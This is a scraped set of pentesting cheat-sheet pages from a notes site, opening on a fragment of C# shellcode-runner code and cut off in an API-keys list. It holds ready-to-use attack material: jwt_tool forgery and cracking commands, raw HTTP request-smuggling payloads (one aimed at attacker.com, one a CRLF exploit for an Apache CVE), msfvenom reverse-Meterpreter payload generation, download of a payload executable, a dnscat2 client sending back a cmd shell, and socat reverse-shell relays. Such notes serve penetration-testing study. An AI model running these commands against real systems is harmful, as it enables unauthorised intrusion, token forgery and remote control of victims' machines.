threadId = 0; IntPtr pinfo = IntPtr.Zero; hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId); WaitForSingleObject(hThread, 0xFFFFFFFF); return; --- # API Token Attacks | Pentesting ![Page cover](https://morgan-bin-bash.gitbook.io/pentesting/~gitbook/image?url=https%3A%2F%2F833483961-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FA916U6dckatxb6TsA24w%252Fuploads%252FWCFtacSCMYrIeEDYyj6E%252FF-PQ6QhWwAAvJIx.jpeg%3Falt%3Dmedia%26token%3Df6d3b26e-b233-4977-9605-bb9f4074fa0e&width=1248&dpr=3&quality=100&sign=9cef98d0&sv=2) [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-token-attacks#token-analysis-with-burp-suite-sequencer) Token Analysis with Burp Suite Sequencer ----------------------------------------------------------------------------------------------------------------------------------------------------------------- #### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-token-attacks#analysis-process) Analysis Process * Utilize Burp Suite to analyze tokens for predictability and aid in token forgery attacks. * Proxy the API authentication request to Burp Suite. * Forward the request to Sequencer for token analysis. * Use Live Capture to interact with the target and capture live tokens. * Define the custom location of the token within the response for analysis. #### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-token-attacks#live-capture-and-analysis) Live Capture and Analysis 1. Configure the custom location of the token. 2. Start live capture to process thousands of requests. 3. Use the "Analyze now" button to see results sooner. 4. Evaluate the randomness and complexity of the analyzed tokens. 5. Identify predictable patterns or weaknesses in the token generation process. #### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-token-attacks#example-crapi-token-analysis) Example: crAPI Token Analysis * Demonstrates that tokens generated by crAPI seem sufficiently random and complex. * Sequencer helps identify if tokens are predictable or lack randomness. * Sequential token generation can lead to predictable tokens, even if seemingly complex. #### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-token-attacks#poor-token-generation-process) Poor Token Generation Process * Analyze "bad tokens" from the Hacking APIs Github repository. * Use the Manual load option to provide a set of bad tokens. * Analyze the tokens to identify patterns or weaknesses in the token generation process. [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-token-attacks#jwt-attacks) JWT Attacks ------------------------------------------------------------------------------------------------------- #### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-token-attacks#undefined) #### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-token-attacks#jwt-tool) JWT Tool * Utilize the jwt\_tool for JWT attacks. * Example Commands: #### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-token-attacks#types-of-jwt-attacks) Types of JWT Attacks 1. The None Attack 2. The Algorithm Switch Attack 3. JWT Crack Attack These techniques allow you to analyze tokens for vulnerabilities, identify weaknesses in token generation, and perform targeted attacks, such as JWT manipulation and cracking. By understanding the characteristics of tokens, you can enhance the security of the API authentication process. [PreviousAPI Reconchevron-left](https://morgan-bin-bash.gitbook.io/pentesting/api-recon) Last updated 2 years ago * [Token Analysis with Burp Suite Sequencer](https://morgan-bin-bash.gitbook.io/pentesting/api-token-attacks#token-analysis-with-burp-suite-sequencer) * [JWT Attacks](https://morgan-bin-bash.gitbook.io/pentesting/api-token-attacks#jwt-attacks) Copy $ jwt_tool -t http://target-name.com/ -rh "Authorization: Bearer JWT_Token" -M pb $ jwt_tool -t http://127.0.0.1:8888/identity/api/v2/user/dashboard -rh "Authorization: Bearer eyJhbGciOiJIUzUxMiJ9..." Copy $ jwt_tool eyJhbGciOiJIUzUxMiJ9... -X a Copy $ crunch 5 5 -o crAPIpw.txt $ jwt_tool TOKEN -C -d /wordlist.txt --- # HTTP Request Smuggling | Pentesting ![Page cover](https://morgan-bin-bash.gitbook.io/pentesting/~gitbook/image?url=https%3A%2F%2F833483961-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FA916U6dckatxb6TsA24w%252Fuploads%252Fz4hhNRD5uTWLfviuIG2Y%252F20.jpg%3Falt%3Dmedia%26token%3D094dfd16-6207-466f-8a81-3f2507f690d3&width=1248&dpr=3&quality=100&sign=59461e28&sv=2) ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/http-request-smuggling#investigation) [Investigationarrow-up-right](https://exploit-notes.hdks.org/exploit/web/security-risk/http-request-smuggling/#investigation) Assume the website has the following HTTP specification. Copy POST /login HTTP/1.1 Host: example.com Content-Type: application/x-www-form-urlencoded Content-Length: 29 username=admin&password=admin Copied! If we change **"Content-Length"** to **"Transfer-Encoding"** as follow, the data is sent in chunks to server. Each chunk consists of the chunk size in bytes (it is expressed in hexadecimal). The message is terminated with a chunk of size zero. Copy POST /login HTTP/1.1 Host: example.com Content-Type: application/x-www-form-urlencoded Transfer-Encoding: chunked 1d username=admin&password=admin 0 Copied! By the way, **Transfer-Encoding** header is not allowed in **HTTP/2**. ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/http-request-smuggling#exploitation-automatically) [Exploitation Automaticallyarrow-up-right](https://exploit-notes.hdks.org/exploit/web/security-risk/http-request-smuggling/#exploitation-automatically) BurpSuite has the useful extension **“HTTP Request Smuggler”**. ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/http-request-smuggling#cl.te-content-length-.-transfer-encoding) [CL.TE (Content-Length . Transfer-Encoding)arrow-up-right](https://exploit-notes.hdks.org/exploit/web/security-risk/http-request-smuggling/#cl.te-(content-length-.-transfer-encoding)) The front-end server uses “Content-Length” header and the back-end server uses “Transfer-Encoding” header. Send the following request twice. If the response delays, we may be able to request smuggling. #### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/http-request-smuggling#exploitation) [Exploitationarrow-up-right](https://exploit-notes.hdks.org/exploit/web/security-risk/http-request-smuggling/#exploitation) The front-end server uses the “Content-Length” header, so ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/http-request-smuggling#te.cl-transfer-encoding-.-content-length) [TE.CL (Transfer-Encoding . Content-Length)arrow-up-right](https://exploit-notes.hdks.org/exploit/web/security-risk/http-request-smuggling/#te.cl-(transfer-encoding-.-content-length)) The front-end server uses **“Trans-Encoding”** header and the back-end server uses **“Content-Length”** header. Send the following request twice. If you use BurpSuite, check the **“Update Content-Length”** option is unchecked to avoid BurpSuite automatically changes the Content-Length depending on data sent. If the response delays, we may be able to request smuggling. #### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/http-request-smuggling#exploitation-1) [Exploitationarrow-up-right](https://exploit-notes.hdks.org/exploit/web/security-risk/http-request-smuggling/#exploitation-1) Send the following request twice. ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/http-request-smuggling#te.te-transfer-encoding-.-transfer-encoding) [TE.TE (Transfer-Encoding . Transfer-Encoding)arrow-up-right](https://exploit-notes.hdks.org/exploit/web/security-risk/http-request-smuggling/#te.te-(transfer-encoding-.-transfer-encoding)) Both the front-end server and the back-end server support the **“Transfer-Encoding”** header but one of the servers can be induced not to process it by obfuscating the header. ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/http-request-smuggling#cl.0-content-length-3a-0) [CL.0 (Content-Length: 0)arrow-up-right](https://exploit-notes.hdks.org/exploit/web/security-risk/http-request-smuggling/#cl.0-(content-length%3A-0)) If the target website ignores the Content-Length, you’re able to access the restricted page by request smuggling. #### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/http-request-smuggling#id-1.-prepare-the-two-same-requests) [1\. Prepare the Two Same Requestsarrow-up-right](https://exploit-notes.hdks.org/exploit/web/security-risk/http-request-smuggling/#1.-prepare-the-two-same-requests) If you're using Burp Suite, send the target request to **Repeater** twice. #### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/http-request-smuggling#id-2.-change-the-first-request-to-post-request) [2\. Change the First Request to POST Requestarrow-up-right](https://exploit-notes.hdks.org/exploit/web/security-risk/http-request-smuggling/#2.-change-the-first-request-to-post-request) #### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/http-request-smuggling#id-3.-set-the-22content-length-3a-0-22-in-the-first-request) [3\. Set the "Content-Length: 0" in the First Requestarrow-up-right](https://exploit-notes.hdks.org/exploit/web/security-risk/http-request-smuggling/#3.-set-the-%22content-length%3A-0%22-in-the-first-request) #### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/http-request-smuggling#id-4.-set-the-22connection-3a-keep-alive-22-in-the-first-request) [4\. Set the "Connection: keep-alive" in the First Requestarrow-up-right](https://exploit-notes.hdks.org/exploit/web/security-risk/http-request-smuggling/#4.-set-the-%22connection%3A-keep-alive%22-in-the-first-request) Now two requests should look like: #### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/http-request-smuggling#id-5.-send-requests-in-order) [5\. Send Requests in Orderarrow-up-right](https://exploit-notes.hdks.org/exploit/web/security-risk/http-request-smuggling/#5.-send-requests-in-order) First off, if you're using Burp Suite, note that **enabling the "Update Content-Length" in the Burp Repeater option.** The sequence is Request 1 -> Request 2. ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/http-request-smuggling#http-2f2-cl.0-content-length-3a-0) [HTTP/2 CL.0 (Content-Length: 0)arrow-up-right](https://exploit-notes.hdks.org/exploit/web/security-risk/http-request-smuggling/#http%2F2-cl.0-(content-length%3A-0)) #### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/http-request-smuggling#id-1.-prepare-request) [1\. Prepare Requestarrow-up-right](https://exploit-notes.hdks.org/exploit/web/security-risk/http-request-smuggling/#1.-prepare-request) If you're using Burp Suite, note that **disable "Update Content-Length" and enable "Allow HTTP/2 ALPN override" in the Burp Repeater option.** The request shoud look like: #### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/http-request-smuggling#id-2.-send-request) [2\. Send Requestarrow-up-right](https://exploit-notes.hdks.org/exploit/web/security-risk/http-request-smuggling/#2.-send-request) Before doing, don't forget to **expand the Inspector on the right in the Repeater and select "HTTP/2".** Now send the request a few times. ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/http-request-smuggling#mod_proxy-misconfiguration-on-apache-e2-89-a52.4.0-2c-2.4.55-e2-89-a4-cve-2023-25690) [mod\_proxy Misconfiguration on Apache ≥2.4.0, 2.4.55≤(CVE-2023-25690)arrow-up-right](https://exploit-notes.hdks.org/exploit/web/security-risk/http-request-smuggling/#mod_proxy-misconfiguration-on-apache-%E2%89%A52.4.0%2C-2.4.55%E2%89%A4(cve-2023-25690)) Reference: [https://github.com/dhmosfunk/CVE-2023-25690-POCarrow-up-right](https://github.com/dhmosfunk/CVE-2023-25690-POC) If target web server allows any characters (`.*`) in `RewriteRule`, it causes HTTP request smuggling. #### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/http-request-smuggling#send-request-with-crlf-5cr-5cn-injection) [Send Request with CRLF (`\r`) Injectionarrow-up-right](https://exploit-notes.hdks.org/exploit/web/security-risk/http-request-smuggling/#send-request-with-crlf-(%5Cr%5Cn)-injection) ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/http-request-smuggling#references) References * [https://portswigger.net/web-security/request-smugglingarrow-up-right](https://portswigger.net/web-security/request-smuggling) [PreviousCrawl/Fuzzchevron-left](https://morgan-bin-bash.gitbook.io/pentesting/crawl-fuzz) [NextApi keyschevron-right](https://morgan-bin-bash.gitbook.io/pentesting/api-keys) Last updated 2 years ago * [Investigation](https://morgan-bin-bash.gitbook.io/pentesting/http-request-smuggling#investigation) * [Exploitation Automatically](https://morgan-bin-bash.gitbook.io/pentesting/http-request-smuggling#exploitation-automatically) * [CL.TE (Content-Length . Transfer-Encoding)](https://morgan-bin-bash.gitbook.io/pentesting/http-request-smuggling#cl.te-content-length-.-transfer-encoding) * [TE.CL (Transfer-Encoding . Content-Length)](https://morgan-bin-bash.gitbook.io/pentesting/http-request-smuggling#te.cl-transfer-encoding-.-content-length) * [TE.TE (Transfer-Encoding . Transfer-Encoding)](https://morgan-bin-bash.gitbook.io/pentesting/http-request-smuggling#te.te-transfer-encoding-.-transfer-encoding) * [CL.0 (Content-Length: 0)](https://morgan-bin-bash.gitbook.io/pentesting/http-request-smuggling#cl.0-content-length-3a-0) * [HTTP/2 CL.0 (Content-Length: 0)](https://morgan-bin-bash.gitbook.io/pentesting/http-request-smuggling#http-2f2-cl.0-content-length-3a-0) * [mod\_proxy Misconfiguration on Apache ≥2.4.0, 2.4.55≤(CVE-2023-25690)](https://morgan-bin-bash.gitbook.io/pentesting/http-request-smuggling#mod_proxy-misconfiguration-on-apache-e2-89-a52.4.0-2c-2.4.55-e2-89-a4-cve-2023-25690) * [References](https://morgan-bin-bash.gitbook.io/pentesting/http-request-smuggling#references) Copy POST /item HTTP/1.1 Host: example.com Content-Length: 9 Transfer-Encoding: chunked 0 EVIL Copied! Copy POST /item HTTP/1.1 Host: example.com Content-Length: 9 Transfer-Encoding: chunked 0 GET /admin HTTP/1.1 Host: example.com Foo: xGET / HTTP/1.1 Host: example.com Copied! Copy POST HTTP/1.1 Host: example.com Content-Type: application/x-www-form-urlencoded Content-Length: 3 Transfer-Encoding: chunked 4 EVIL 0 Copied! Copy POST / HTTP/1.1 Host: example.com Content-Type: application/x-www-form-urlencoded Content-Length: 4 Transfer-Encoding: chunked 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 15 x=1 0 Copied! Copy Transfer-Encoding: xchunked Transfer-Encoding: chunked Transfer-Encoding: x Copied! Copy # Request 1 POST / HTTP/1.1 Host: example.com Cookie: key=value Connection: keep-alive Content-Length: 0 GET /admin/delete?username=john Foo: x # ------------------------------------------------- # Request 2 GET / HTTP/1.1 Host: example.com Cookie: key=value Connection: close Copied! Copy POST / HTTP/2 Host: example.com Content-Length: 0 GET /exploit HTTP/1.1 Host: attacker.com Content-Length: 5 x=1 Copied! Copy RewriteEngine on RewriteRule "^/products/(.*)" "http://127.0.0.1:8080/?productId=$1" [P] ProxyPassReverse "/" "http://127.0.0.1:8080:/" Copied! Copy GET /products/1%20HTTP/1.1%0d%0aHost:%20127.0.0.1%0d%0a%0d%0aGET%20/SMUGGLED HTTP/1.1 # It means the following: # # GET /products/1 HTTP/1.1 # Host: 127.0.0.1 # # GET /SMUGGLED HTTP/1.1 Copied! --- # Pivoting, Tunneling, and Port Forwarding | Pentesting ![Page cover](https://morgan-bin-bash.gitbook.io/pentesting/~gitbook/image?url=https%3A%2F%2F833483961-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FA916U6dckatxb6TsA24w%252Fuploads%252FBbYcY3pq1hZQUt7Jpn3m%252Fjhjhjh.jpg%3Falt%3Dmedia%26token%3D85dbcab3-1fd7-469f-8d86-24a56bf47c3f&width=1248&dpr=3&quality=100&sign=825e84fd&sv=2) [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-tunneling-and-port-forwarding#dynamic-port-forwarding-with-ssh-and-socks-tunneling) Dynamic Port Forwarding with SSH and SOCKS Tunneling -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Command Description `ifconfig` Linux-based command that displays all current network configurations of a system. `ipconfig` Windows-based command that displays all system network configurations. `netstat -r` Command used to display the routing table for all IPv4-based protocols. `nmap -sT -p22,3306 ` Nmap command used to scan a target for open ports allowing SSH or MySQL connections. `ssh -L 1234:localhost:3306 Ubuntu@` SSH command used to create an SSH tunnel from a local machine on local port 1234 to a remote target using port 3306. \`netstat -antp grep 1234\` `nmap -v -sV -p1234 localhost` Nmap command used to scan a host through a connection that has been made on local port 1234. `ssh -L 1234:localhost:3306 8080:localhost:80 ubuntu@` SSH command that instructs the ssh client to request the SSH server forward all data via port 1234 to localhost:3306. `ssh -D 9050 ubuntu@` SSH command used to perform a dynamic port forward on port 9050 and establishes an SSH tunnel with the target. This is part of setting up a SOCKS proxy. `tail -4 /etc/proxychains.conf` Linux-based command used to display the last 4 lines of /etc/proxychains.conf. Can be used to ensure socks configurations are in place. `proxychains nmap -v -sn 172.16.5.1-200` Used to send traffic generated by an Nmap scan through Proxychains and a SOCKS proxy. Scan is performed against the hosts in the specified range 172.16.5.1-200 with increased verbosity (-v) disabling ping scan (-sn). `proxychains nmap -v -Pn -sT 172.16.5.19` Used to send traffic generated by an Nmap scan through Proxychains and a SOCKS proxy. Scan is performed against 172.16.5.19 with increased verbosity (-v), disabling ping discover (-Pn), and using TCP connect scan type (-sT). `proxychains msfconsole` Uses Proxychains to open Metasploit and send all generated network traffic through a SOCKS proxy. `msf6 > search rdp_scanner` Metasploit search that attempts to find a module called rdp\_scanner. `proxychains xfreerdp /v: /u:victor /p:pass@123` Used to connect to a target using RDP and a set of credentials using proxychains. This will send all traffic through a SOCKS proxy. [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-tunneling-and-port-forwarding#remote-reverse-port-forwarding-with-ssh) Remote/Reverse Port Forwarding with SSH ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ Command Description `msfvenom -p windows/x64/meterpreter/reverse_https lhost= -f exe -o backupscript.exe LPORT=8080` Uses msfvenom to generate a Windows-based reverse HTTPS Meterpreter payload that will send a call back to the IP address specified following lhost= on local port 8080 (LPORT=8080). Payload will take the form of an executable file called backupscript.exe. `msf6 > use exploit/multi/handler` Used to select the multi-handler exploit module in Metasploit. `scp backupscript.exe ubuntu@:~/` Uses secure copy protocol (scp) to transfer the file backupscript.exe to the specified host and places it in the Ubuntu user's home directory (:~/). `python3 -m http.server 8123` Uses Python3 to start a simple HTTP server listening on port 8123. Can be used to retrieve files from a host. `Invoke-WebRequest -Uri "http://172.16.5.129:8123/backupscript.exe" -OutFile "C:\backupscript.exe"` PowerShell command used to download a file called backupscript.exe from a webserver (172.16.5.129:8123) and then save the file to the location specified after -OutFile. `ssh -R :8080:0.0.0.0:80 ubuntu@ -vN` SSH command used to create a reverse SSH tunnel from a target to an attack host. Traffic is forwarded on port 8080 on the attack host to port 80 on the target. [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-tunneling-and-port-forwarding#meterpreter-tunneling-and-port-forwarding) Meterpreter Tunneling & Port Forwarding -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Command Description `msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST= run post/multi/gather/ping_sweep RHOSTS=172.16.5.0/23` Metasploit command that runs a ping sweep module against the specified network segment (RHOSTS=172.16.5.0/23). `for i in {1..254} ;do (ping -c 1 172.16.5.$i | grep "bytes from" &) ;done` For Loop used on a Linux-based system to discover devices in a specified network segment. `for /L %i in (1 1 254) do ping 172.16.5.%i -n 1 -w 100 | find "Reply"` For Loop used on a Windows-based system to discover devices in a specified network segment. `msf6 > use auxiliary/server/socks_proxy` Metasploit command that selects the socks\_proxy auxiliary module. `msf6 auxiliary(server/socks_proxy) > jobs` Metasploit command that lists all currently running jobs. `socks4 127.0.0.1 9050` Line of text that should be added to /etc/proxychains.conf to ensure a SOCKS version 4 proxy is used in combination with proxychains on the specified IP address and port. `Socks5 127.0.0.1 1080` Line of text that should be added to /etc/proxychains.conf to ensure a SOCKS version 5 proxy is used in combination with proxychains on the specified IP address and port. `msf6 > use post/multi/manage/autoroute` Metasploit command used to select the autoroute module. `meterpreter > help portfwd` Meterpreter command used to display the features of the portfwd command. `meterpreter > portfwd add -l 3300 -p 3389 -r ` Meterpreter-based portfwd command that adds a forwarding rule to the current Meterpreter session. This rule forwards network traffic on port 3300 on the local machine to port 3389 (RDP) on the target. `xfreerdp /v:localhost:3300 /u:victor /p:pass@123` Uses xfreerdp to connect to a remote host through localhost:3300 using a set of credentials. Port forwarding rules must be in place for this to work properly. `netstat -antp` Used to display all (-a) active network connections with associated process IDs. -t displays only TCP connections.-n displays only numerical addresses. -p displays process IDs associated with each displayed connection. `meterpreter > portfwd add -R -l 8081 -p 1234 -L ` Meterpreter-based portfwd command that adds a forwarding rule that directs traffic coming on on port 8081 to the port 1234 listening on the IP address of the Attack Host. `meterpreter > bg` Meterpreter-based command used to run the selected metepreter session in the background. Similar to background a process in Linux [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-tunneling-and-port-forwarding#socat-redirection-with-a-reverse-shell) Socat Redirection with a Reverse Shell ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Command Description `socat TCP4-LISTEN:8080,fork TCP4::80` Uses Socat to listen on port 8080 and then to fork when the connection is received. It will then connect to the attack host on port 80. `socat TCP4-LISTEN:8080,fork TCP4::8443` Uses Socat to listen on port 8080 and then to fork when the connection is received. Then it will connect to the target host on port 8443. [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-tunneling-and-port-forwarding#ssh-for-windows-plink.exe) SSH for Windows: plink.exe --------------------------------------------------------------------------------------------------------------------------------------------------------- Command Description `plink -D 9050 ubuntu@` Windows-based command that uses PuTTY's Plink.exe to perform SSH dynamic port forwarding and establishes an SSH tunnel with the specified target. This will allow for proxy chaining on a Windows host, similar to what is done with Proxychains on a Linux-based host. [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-tunneling-and-port-forwarding#ssh-pivoting-with-sshuttle) SSH Pivoting with Sshuttle ---------------------------------------------------------------------------------------------------------------------------------------------------------- Command Description `sudo apt-get install sshuttle` Uses apt-get to install the tool sshuttle. `sudo sshuttle -r ubuntu@10.129.202.64 172.16.5.0 -v` Runs sshuttle, connects to the target host, and creates a route to the 172.16.5.0 network so traffic can pass from the attack host to hosts on the internal network (172.16.5.0). [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-tunneling-and-port-forwarding#web-server-pivoting-with-rpivot) Web Server Pivoting with Rpivot -------------------------------------------------------------------------------------------------------------------------------------------------------------------- Command Description `sudo git clone https://github.com/klsecservices/rpivot.git` Clones the rpivot project GitHub repository. `sudo apt-get install python2.7` Uses apt-get to install python2.7. `python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0` Used to run the rpivot server (server.py) on proxy port 9050, server port 9999 and listening on any IP address (0.0.0.0). `scp -r rpivot ubuntu@` Uses secure copy protocol to transfer an entire directory and all of its contents to a specified target. `python2.7 client.py --server-ip 10.10.14.18 --server-port 9999` Used to run the rpivot client (client.py) to connect to the specified rpivot server on the appropriate port. `proxychains firefox-esr :80` Opens firefox with Proxychains and sends the web request through a SOCKS proxy server to the specified destination web server. `python client.py --server-ip --server-port 8080 --ntlm-proxy-ip IPaddressofProxy> --ntlm-proxy-port 8081 --domain --username --password ` Use to run the rpivot client to connect to a web server that is using HTTP-Proxy with NTLM authentication. [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-tunneling-and-port-forwarding#port-forwarding-with-windows-netsh) Port Forwarding with Windows Netsh -------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Command Description `netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.42.198 connectport=3389 connectaddress=172.16.5.25` Windows-based command that uses netsh.exe to configure a portproxy rule called v4tov4 that listens on port 8080 and forwards connections to the destination 172.16.5.25 on port 3389. `netsh.exe interface portproxy show v4tov4` Windows-based command used to view the configurations of a portproxy rule called v4tov4. [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-tunneling-and-port-forwarding#dns-tunneling-with-dnscat2) DNS Tunneling with Dnscat2 ---------------------------------------------------------------------------------------------------------------------------------------------------------- Command Description `git clone https://github.com/iagox86/dnscat2.git` Clones the dnscat2 project GitHub repository. `sudo ruby dnscat2.rb --dns host=10.10.14.18,port=53,domain=inlanefreight.local --no-cache` Used to start the dnscat2.rb server running on the specified IP address, port (53) & using the domain inlanefreight.local with the no-cache option enabled. `git clone https://github.com/lukebaggett/dnscat2-powershell.git` Clones the dnscat2-powershell project Github repository. `Import-Module dnscat2.ps1` PowerShell command used to import the dnscat2.ps1 tool. `Start-Dnscat2 -DNSserver 10.10.14.18 -Domain inlanefreight.local -PreSharedSecret 0ec04a91cd1e963f8c03ca499d589d21 -Exec cmd` PowerShell command used to connect to a specified dnscat2 server using an IP address, domain name, and preshared secret. The client will send back a shell connection to the server (-Exec cmd). `dnscat2> ?` Used to list dnscat2 options. `dnscat2> window -i 1` Used to interact with an established dnscat2 session. `./chisel server -v -p 1234 --socks5` Used to start a chisel server in verbose mode listening on port 1234 using SOCKS version 5. `./chisel client -v 10.129.202.64:1234 socks` Used to connect to a chisel server at the specified IP address & port using socks. [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-tunneling-and-port-forwarding#icmp-tunneling-with-socks) ICMP Tunneling with SOCKS -------------------------------------------------------------------------------------------------------------------------------------------------------- Command Description `git clone https://github.com/utoni/ptunnel-ng.git` Clones the ptunnel-ng project GitHub repository. `sudo ./autogen.sh` Used to run the autogen.sh shell script that will build the necessary ptunnel-ng files. `sudo ./ptunnel-ng -r10.129.202.64 -R22` Used to start the ptunnel-ng server on the specified IP address (-r) and corresponding port (-R22). `sudo ./ptunnel-ng -p10.129.202.64 -l2222 -r10.129.202.64 -R22` Used to connect to a specified ptunnel-ng server through local port 2222 (-l2222). `ssh -p2222 -lubuntu 127.0.0.1` SSH command used to connect to an SSH server through a local port. This can be used to tunnel SSH traffic through an ICMP tunnel. [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-tunneling-and-port-forwarding#rdp-and-socks-tunneling-with-socksoverrdp) RDP and SOCKS Tunneling with SocksOverRDP ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Command Description `regsvr32.exe SocksOverRDP-Plugin.dll` Windows-based command used to register the SocksOverRDP-PLugin.dll. \`netstat -antb findstr 1080\` [PreviousApi keyschevron-left](https://morgan-bin-bash.gitbook.io/pentesting/api-keys) [NextShells & Payloadschevron-right](https://morgan-bin-bash.gitbook.io/pentesting/shells-and-payloads) Last updated 2 years ago * [Dynamic Port Forwarding with SSH and SOCKS Tunneling](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-tunneling-and-port-forwarding#dynamic-port-forwarding-with-ssh-and-socks-tunneling) * [Remote/Reverse Port Forwarding with SSH](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-tunneling-and-port-forwarding#remote-reverse-port-forwarding-with-ssh) * [Meterpreter Tunneling & Port Forwarding](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-tunneling-and-port-forwarding#meterpreter-tunneling-and-port-forwarding) * [Socat Redirection with a Reverse Shell](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-tunneling-and-port-forwarding#socat-redirection-with-a-reverse-shell) * [SSH for Windows: plink.exe](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-tunneling-and-port-forwarding#ssh-for-windows-plink.exe) * [SSH Pivoting with Sshuttle](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-tunneling-and-port-forwarding#ssh-pivoting-with-sshuttle) * [Web Server Pivoting with Rpivot](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-tunneling-and-port-forwarding#web-server-pivoting-with-rpivot) * [Port Forwarding with Windows Netsh](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-tunneling-and-port-forwarding#port-forwarding-with-windows-netsh) * [DNS Tunneling with Dnscat2](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-tunneling-and-port-forwarding#dns-tunneling-with-dnscat2) * [ICMP Tunneling with SOCKS](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-tunneling-and-port-forwarding#icmp-tunneling-with-socks) * [RDP and SOCKS Tunneling with SocksOverRDP](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-tunneling-and-port-forwarding#rdp-and-socks-tunneling-with-socksoverrdp) --- # Api keys | Pentesting ![Page cover](https://morgan-bin-bash.gitbook.io/pentesting/~gitbook/image?url=https%3A%2F%2F833483961-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FA916U6dckatxb6TsA24w%252Fuploads%252FBbYcY3pq1hZQUt7Jpn3m%252Fjhjhjh.jpg%3Falt%3Dmedia%26token%3D85dbcab3-1fd7-469f-8d86-24a56bf47c3f&width=1248&dpr=3&quality=100&sign=825e84fd&sv=2) [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#table-of-contents) Table of Contents ---------------------------------------------------------------------------------------------------------- * [ABTasty API Keyarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#ABTasty-API-Key) * [Algolia API keyarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#Algolia-API-key) * [Amplitude API Keysarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#Amplitude-API-Keys) * [Asana Access tokenarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#Asana-Access-Token) * [AWS Access Key ID and Secretarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#AWS-Access-Key-ID-and-Secret) * [Azure Application Insights APP ID and API Keyarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#Azure-Application-Insights-APP-ID-and-API-Key) * [Bazaarvoice Passkeyarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#Bazaarvoice-Passkey) * [Bing Maps API Keyarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#Bing-Maps-API-Key) * [Bit.ly Access tokenarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#Bitly-Access-token) * [Branch.io Key and Secretarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#BranchIO-Key-and-Secret) * [BrowserStack Access Keyarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#BrowserStack-Access-Key) * [Buildkite Access tokenarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#Buildkite-Access-token) * [ButterCMS API 